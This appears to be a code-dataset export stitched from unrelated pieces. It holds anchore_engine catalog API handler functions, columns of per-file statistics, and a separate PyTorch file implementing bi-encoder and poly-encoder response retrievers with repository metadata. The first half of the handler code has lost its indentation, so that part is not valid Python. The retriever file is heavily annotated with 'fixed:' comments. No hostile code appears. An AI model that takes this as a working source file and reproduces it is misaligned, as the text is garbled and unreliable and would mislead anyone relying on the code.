service_record = anchore_engine.subsys.servicestatus.get_my_service_record()
return_object = anchore_engine.subsys.servicestatus.get_status(service_record)
httpcode = 200
except Exception as err:
return_object = str(err)
return (return_object, httpcode)
def query_vulnerabilities_get(id=None, affected_package=None, affected_package_version=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'id': id, 'affected_package': affected_package, 'affected_package_version': affected_package_version})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_vulnerabilities(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def query_images_by_package_get(name=None, version=None, package_type=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'name': name, 'version': version, 'package_type': package_type})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_images_by_package(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def query_images_by_vulnerability_get(vulnerability_id=None, severity=None, namespace=None, affected_package=None, vendor_only=True):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'vulnerability_id': vulnerability_id, 'severity': severity, 'namespace': namespace, 'affected_package': affected_package, 'vendor_only': vendor_only})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.query_images_by_vulnerability(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def repo_post(regrepo=None, autosubscribe=False, lookuptag=None, bodycontent={}):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'regrepo': regrepo, 'autosubscribe': autosubscribe, 'lookuptag': lookuptag})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.repo(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_tags_get():
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_tags(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_get(tag=None, digest=None, imageId=None, registry_lookup=False, history=False):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request,
default_params={'tag': tag, 'digest': digest, 'imageId': imageId, 'registry_lookup': registry_lookup, 'history': history})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def image_post(bodycontent={}, tag=None, digest=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'tag': tag, 'digest': digest})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
logger.exception('Error processing image add')
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/image/<imageDigest>', methods=['GET', 'PUT', 'DELETE'])
@flask_metrics.do_not_track()
def image_imageDigest_get(imageDigest):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def image_imageDigest_put(imageDigest, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def image_imageDigest_delete(imageDigest, force=False):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'force':False})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_imageDigest(session, request_inputs, imageDigest)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/registry_lookup', methods=['GET'])
@flask_metrics.do_not_track()
def registry_lookup(tag=None, digest=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'tag': tag, 'digest': digest})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.registry_lookup(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/import', methods=['POST'])
def image_import(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.image_import(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# policy calls
# subscription calls
# @api.route('/subscriptions', methods=['GET', 'POST'])
def subscriptions_get(subscription_key=None, subscription_type=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'subscription_key':subscription_key, 'subscription_type':subscription_type})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
def subscriptions_post(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# @api.route('/subscriptions/<subscriptionId>', methods=['GET', 'PUT', 'DELETE'])
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_get(subscriptionId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_put(subscriptionId, bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def subscriptions_subscriptionId_delete(subscriptionId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.subscriptions(session, request_inputs, subscriptionId=subscriptionId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_get(source_servicename=None, source_hostid=None, resource_type=None, resource_id=None, level=None, since=None, before=None, page=None, limit=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request,
default_params={'source_servicename': source_servicename,
'source_hostid': source_hostid,
'resource_type': resource_type,
'resource_id': resource_id,
'level': level,
'since': since,
'before': before,
'page': page,
'limit': limit})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_post(bodycontent):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs, bodycontent=bodycontent)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_delete(since=None, before=None, level=None):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'since': since, 'before': before, 'level': level})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events(session, request_inputs)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_eventId_get(eventId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events_eventId(session, request_inputs, eventId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
@flask_metrics.do_not_track()
def events_eventId_delete(eventId):
try:
request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
with db.session_scope() as session:
return_object, httpcode = anchore_engine.services.catalog.catalog_impl.events_eventId(session, request_inputs, eventId)
except Exception as err:
httpcode = 500
return_object = str(err)
return (return_object, httpcode)
# user calls
# @api.route("/users", methods=['GET'])
def users_get():
    """GET /users handler: list users via catalog_impl.users.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users(dbsession, request_inputs)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/users/<inuserId>", methods=['GET', 'DELETE'])
@flask_metrics.do_not_track()
def users_userId_get(inuserId):
    """GET /users/<inuserId> handler: fetch a single user record.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users_userId(dbsession, request_inputs, inuserId)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
@flask_metrics.do_not_track()
def users_userId_delete(inuserId):
    """DELETE /users/<inuserId> handler: remove a single user record.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.users_userId(dbsession, request_inputs, inuserId)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# archive calls
# @api.route('/archive/<bucket>/<archiveid>', methods=['GET', 'POST'])
@flask_metrics.do_not_track()
def archive_get(bucket, archiveid):
    """GET /archive/<bucket>/<archiveid> handler: fetch an archive document.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.archive(dbsession, request_inputs, bucket, archiveid)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
@flask_metrics.do_not_track()
def archive_post(bucket, archiveid, bodycontent):
    """POST /archive/<bucket>/<archiveid> handler: store an archive document.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.archive(dbsession, request_inputs, bucket, archiveid, bodycontent=bodycontent)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# system/service calls
# @api.route("/system", methods=['GET'])
def system_get():
    """GET /system handler: report system-level information.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system(dbsession, request_inputs)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/services", methods=['GET'])
def system_services_get():
    """GET /system/services handler: list registered services.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services(dbsession, request_inputs)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/services/<servicename>", methods=['GET'])
@flask_metrics.do_not_track()
def system_services_servicename_get(servicename):
    """GET /system/services/<servicename> handler: describe one service.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename(dbsession, request_inputs, servicename)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/services/<servicename>/<hostId>", methods=['GET', 'DELETE'])
@flask_metrics.do_not_track()
def system_services_servicename_hostId_get(servicename, hostId):
    """GET /system/services/<servicename>/<hostId> handler: describe one
    service instance on a specific host.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename_hostId(dbsession, request_inputs, servicename, hostId)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
@flask_metrics.do_not_track()
def system_services_servicename_hostId_delete(servicename, hostId):
    """DELETE /system/services/<servicename>/<hostId> handler: remove one
    service instance registration on a specific host.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_services_servicename_hostId(dbsession, request_inputs, servicename, hostId)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/registries", methods=['GET', 'POST'])
def system_registries_get():
    """GET /system/registries handler: list configured registries.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries(dbsession, request_inputs)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
def system_registries_post(bodycontent, validate=True):
    """POST /system/registries handler: add a registry configuration.

    Args:
        bodycontent: registry definition from the request body.
        validate: when True, ask the implementation to validate the registry.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'validate': validate})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries(dbsession, request_inputs, bodycontent=bodycontent)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/registries/<registry>", methods=['GET', 'DELETE', 'PUT'])
@flask_metrics.do_not_track()
def system_registries_registry_get(registry):
    """GET /system/registries/<registry> handler: fetch one registry config.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(dbsession, request_inputs, registry)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
@flask_metrics.do_not_track()
def system_registries_registry_delete(registry):
    """DELETE /system/registries/<registry> handler: remove a registry config.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(dbsession, request_inputs, registry)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
@flask_metrics.do_not_track()
def system_registries_registry_put(registry, bodycontent, validate=True):
    """PUT /system/registries/<registry> handler: update a registry config.

    Args:
        registry: registry identifier from the URL path.
        bodycontent: updated registry definition from the request body.
        validate: when True, ask the implementation to validate the registry.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'validate': validate})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_registries_registry(dbsession, request_inputs, registry, bodycontent=bodycontent)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
# @api.route("/system/subscriptions", methods=['GET'])
def system_subscriptions_get():
    """GET /system/subscriptions handler: list system subscriptions.

    Returns a (response_object, http_status) tuple; failures are logged and
    become a 500 with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_subscriptions(dbsession, request_inputs)
    except Exception as ex:
        logger.exception('Error fetching subscriptions')
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
def system_prune_get():
    """GET /system/prune handler: list prunable resource types.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune_listresources(dbsession, request_inputs)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
def system_prune_resourcetype_get(resourcetype, dangling=True, olderthan=None):
    """GET /system/prune/<resourcetype> handler: list prune candidates.

    Args:
        resourcetype: the resource type to inspect.
        dangling: restrict to dangling resources when True.
        olderthan: optional age filter passed through to the implementation.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={'dangling': dangling, 'olderthan': olderthan})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune(dbsession, request_inputs, resourcetype)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
def system_prune_resourcetype_post(resourcetype, bodycontent):
    """POST /system/prune/<resourcetype> handler: execute a prune request.

    Returns a (response_object, http_status) tuple; failures become a 500
    with the stringified error as the body.
    """
    return_object, httpcode = None, 500
    try:
        request_inputs = anchore_engine.services.common.do_request_prep(connexion.request, default_params={})
        with db.session_scope() as dbsession:
            return_object, httpcode = anchore_engine.services.catalog.catalog_impl.system_prune(dbsession, request_inputs, resourcetype, bodycontent=bodycontent)
    except Exception as ex:
        httpcode = 500
        return_object = str(ex)
    return return_object, httpcode
| 40.80339
| 257
| 0.707651
| 2,750
| 24,074
| 5.923636
| 0.044727
| 0.092818
| 0.108287
| 0.072192
| 0.852056
| 0.847759
| 0.845365
| 0.840516
| 0.83051
| 0.818355
| 0
| 0.00671
| 0.201421
| 24,074
| 589
| 258
| 40.872666
| 0.840624
| 0.039586
| 0
| 0.760095
| 0
| 0
| 0.018658
| 0.001039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099762
| false
| 0
| 0.026128
| 0
| 0.225653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7d27a5ce2c9279fcdaf133039661b711364c355
| 10,625
|
py
|
Python
|
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
src/retrievers.py
|
M-Puig/Erato
|
97f7cf913c54aacc55bbc76f4eadc55641a44c2d
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
# Bi-encoder
class RetrieverBiencoder(nn.Module):
    """Bi-encoder retriever.

    Context and response are encoded independently by a shared BERT encoder;
    relevance is the dot product of their position-0 ([CLS]) embeddings.
    """

    def __init__(self, bert):
        super().__init__()
        self.bert = bert

    def score(self, context, context_mask, responses, responses_mask):
        """Score each (context, response) pair in the batch.

        Args:
            context: [bs, seq_len] token-id tensor; context_mask the matching mask.
            responses: [bs, seq_len] token-id tensor; responses_mask the matching mask.
        Returns:
            Dot-product score per batch element.
        """
        context_vec = self.bert(context, context_mask)[0][:, 0, :]  # [bs, dim] ([CLS])
        batch_size, res_length = responses.shape  # fixed: was the undefined name `response`
        # fixed: original referenced undefined `responses_input_ids`/`responses_input_masks`
        responses_vec = self.bert(responses, responses_mask)[0][:, 0, :]  # [bs, dim]
        responses_vec = responses_vec.view(batch_size, 1, -1)  # [bs, 1, dim]
        # fixed: dropped the squeeze(1) that flattened responses_vec back to 2-D,
        # which made the 3-D permute(0, 2, 1) below raise at runtime
        context_vec = context_vec.unsqueeze(1)  # [bs, 1, dim]
        # [bs, 1, 1] -> squeeze() -> per-element score
        dot_product = torch.matmul(context_vec, responses_vec.permute(0, 2, 1)).squeeze()
        return dot_product

    def compute_loss(self, context, context_mask, response, response_mask):
        """In-batch-negatives loss: each context is scored against every
        response in the batch; the diagonal pairs are the positives.
        """
        # fixed: take the [CLS] vector (as score() does); the original kept the
        # whole [bs, seq, dim] sequence, making the intended [bs, bs] score
        # matrix below ill-shaped
        context_vec = self.bert(context, context_mask)[0][:, 0, :]  # [bs, dim]
        responses_vec = self.bert(response, response_mask)[0][:, 0, :]  # [bs, dim]
        # fixed: removed leftover debug print() calls and a no-op squeeze
        dot_product = torch.matmul(context_vec, responses_vec.t())  # [bs, bs]
        mask = torch.eye(context.size(0)).to(context_mask.device)
        loss = F.log_softmax(dot_product, dim=-1) * mask
        loss = (-loss.sum(dim=1)).mean()
        return loss
# Single Bert Polyencoder
class RetrieverPolyencoder(nn.Module):
    """Poly-encoder retriever with a single shared BERT encoder.

    The context is summarised by attending `max_len` learned positional
    queries over its hidden states; candidates then attend over those
    summaries and are scored with a dot product.
    """

    def __init__(self, bert, max_len = 300, hidden_dim = 768, out_dim = 64, num_layers = 2, dropout=0.1, device=None):
        super().__init__()
        # Default device selection: explicit argument wins, else CUDA if available.
        if device is None:
            self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
        else:
            self.device = device
        self.hidden_dim = hidden_dim
        self.max_len = max_len
        self.out_dim = out_dim
        self.bert = bert
        # Context layers
        self.contextDropout = nn.Dropout(dropout)
        # Candidates layers
        self.pos_emb = nn.Embedding(self.max_len, self.hidden_dim)
        self.candidatesDropout = nn.Dropout(dropout)
        self.att_dropout = nn.Dropout(dropout)

    def attention(self, q, k, v, vMask=None):
        """Dot-product attention of q over k/v with dropout on the weights.

        NOTE(review): the mask is applied multiplicatively to the raw logits
        rather than as an additive -inf, so masked positions still receive
        softmax weight exp(0); kept as-is to preserve existing behaviour.
        """
        w = torch.matmul(q, k.transpose(-1, -2))
        if vMask is not None:
            w *= vMask.unsqueeze(1)
        w = F.softmax(w, -1)
        w = self.att_dropout(w)
        score = torch.matmul(w, v)
        return score

    def score(self, context, context_mask, responses, responses_mask):
        """Score `nb_cand` candidate responses per context.

        Args:
            context: [bs, seq_len] token ids; context_mask the matching mask.
            responses: [bs, nb_cand, seq_len] token ids; responses_mask likewise.
        Returns:
            [bs, nb_cand] dot-product scores.
        """
        batch_size, nb_cand, seq_len = responses.shape
        # Context: full hidden-state sequence [bs, seq, dim].
        # fixed: original sliced [:, 0, :] here, which broke the attention
        # shapes and was inconsistent with compute_loss()
        context_encoded = self.bert(context, context_mask)[0]
        pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
        context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
        # Responses: position-0 ([CLS]) embedding per candidate -> [bs, nb_cand, dim]
        responses_encoded = self.bert(responses.view(-1, responses.shape[2]), responses_mask.view(-1, responses.shape[2]))[0][:, 0, :]
        responses_encoded = responses_encoded.view(batch_size, nb_cand, -1)
        # fixed: removed `self.candidatesFc(response_encoded)` — neither the layer
        # nor the name exists on this class (copy-paste from the double-BERT
        # variant) and the line raised at runtime
        context_emb = self.attention(responses_encoded, context_att, context_att).squeeze()
        dot_product = (context_emb * responses_encoded).sum(-1)
        return dot_product

    def compute_loss(self, context, context_mask, response, response_mask):
        """In-batch-negatives loss over the [bs, bs] context/response score
        matrix; diagonal entries are the positive pairs.
        """
        batch_size = context.shape[0]
        # Context summaries: [bs, max_len, dim]
        context_encoded = self.bert(context, context_mask)[0]
        pos_emb = self.pos_emb(torch.arange(self.max_len).to(self.device))
        context_att = self.attention(pos_emb, context_encoded, context_encoded, context_mask)
        # Response [CLS] vectors, broadcast to [bs, bs, dim] so every context
        # is scored against every response in the batch
        response_encoded = self.bert(response, response_mask)[0][:, 0, :]
        response_encoded = response_encoded.unsqueeze(0).expand(batch_size, batch_size, response_encoded.shape[1])
        context_emb = self.attention(response_encoded, context_att, context_att).squeeze()
        dot_product = (context_emb * response_encoded).sum(-1)
        mask = torch.eye(batch_size).to(self.device)
        loss = F.log_softmax(dot_product, dim=-1) * mask
        loss = (-loss.sum(dim=1)).mean()
        return loss
# Double Bert Polyencoder
class RetrieverPolyencoder_double(nn.Module):
    """Poly-encoder retriever with separate context and candidate BERT encoders."""

    def __init__(self, contextBert, candidateBert, vocab, max_len = 300, hidden_dim = 768, out_dim = 64, num_layers = 2, dropout=0.1, device=None):
        super().__init__()
        # Resolve the compute device: explicit argument wins, otherwise CUDA
        # when available, else CPU.
        if device is None:
            self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        else:
            self.device = device
        self.hidden_dim = hidden_dim
        self.max_len = max_len
        self.out_dim = out_dim
        # Context-side encoder, dropout and projection
        self.contextBert = contextBert
        self.contextDropout = nn.Dropout(dropout)
        self.contextFc = nn.Linear(self.hidden_dim, self.out_dim)
        # Candidate-side encoder, positional codes, dropout and projection
        self.candidatesBert = candidateBert
        self.pos_emb = nn.Embedding(self.max_len, self.hidden_dim)
        self.candidatesDropout = nn.Dropout(dropout)
        self.candidatesFc = nn.Linear(self.hidden_dim, self.out_dim)
        self.att_dropout = nn.Dropout(dropout)

    def attention(self, q, k, v, vMask=None):
        """Dot-product attention of `q` over `k`/`v` with an optional
        multiplicative mask applied to the raw logits."""
        logits = torch.matmul(q, k.transpose(-1, -2))
        if vMask is not None:
            logits *= vMask.unsqueeze(1)
        weights = self.att_dropout(F.softmax(logits, -1))
        return torch.matmul(weights, v)

    def score(self, context, context_mask, responses, responses_mask):
        """Score every candidate in `responses` ([bs, nb_cand, seq_len])
        against its context; returns [bs, nb_cand] dot products."""
        batch_size, nb_cand, seq_len = responses.shape
        # Context side: attend the learned positional codes over the encoder output.
        context_encoded = self.contextBert(context, context_mask)[-1]
        codes = self.pos_emb(torch.arange(self.max_len).to(self.device))
        context_att = self.attention(codes, context_encoded, context_encoded, context_mask)
        # Candidate side: flatten the candidate dimension, encode, keep position 0.
        flat_ids = responses.view(-1, responses.shape[2])
        flat_mask = responses_mask.view(-1, responses.shape[2])
        responses_encoded = self.candidatesBert(flat_ids, flat_mask)[-1][:, 0, :]
        responses_encoded = responses_encoded.view(batch_size, nb_cand, -1)
        # Candidates attend over the context codes; score by elementwise dot.
        context_emb = self.attention(responses_encoded, context_att, context_att).squeeze()
        return (context_emb * responses_encoded).sum(-1)

    def compute_loss(self, context, context_mask, response, response_mask):
        """In-batch-negatives loss: each context is scored against every
        response in the batch, with positives on the diagonal."""
        batch_size = context.shape[0]
        context_encoded = self.contextBert(context, context_mask)[-1]
        codes = self.pos_emb(torch.arange(self.max_len).to(self.device))
        context_att = self.attention(codes, context_encoded, context_encoded, context_mask)
        # Broadcast each response embedding against every context in the batch.
        response_encoded = self.candidatesBert(response, response_mask)[-1][:, 0, :]
        response_encoded = response_encoded.unsqueeze(0).expand(batch_size, batch_size, response_encoded.shape[1])
        context_emb = self.attention(response_encoded, context_att, context_att).squeeze()
        scores = (context_emb * response_encoded).sum(-1)
        diagonal = torch.eye(batch_size).to(self.device)
        loss = F.log_softmax(scores, dim=-1) * diagonal
        return (-loss.sum(dim=1)).mean()
| 43.016194
| 147
| 0.646118
| 1,366
| 10,625
| 4.836018
| 0.106149
| 0.032698
| 0.032698
| 0.023009
| 0.90115
| 0.887981
| 0.87148
| 0.864668
| 0.855283
| 0.816228
| 0
| 0.011107
| 0.262776
| 10,625
| 247
| 148
| 43.016194
| 0.832248
| 0.272282
| 0
| 0.761538
| 0
| 0
| 0.001908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084615
| false
| 0
| 0.023077
| 0
| 0.192308
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
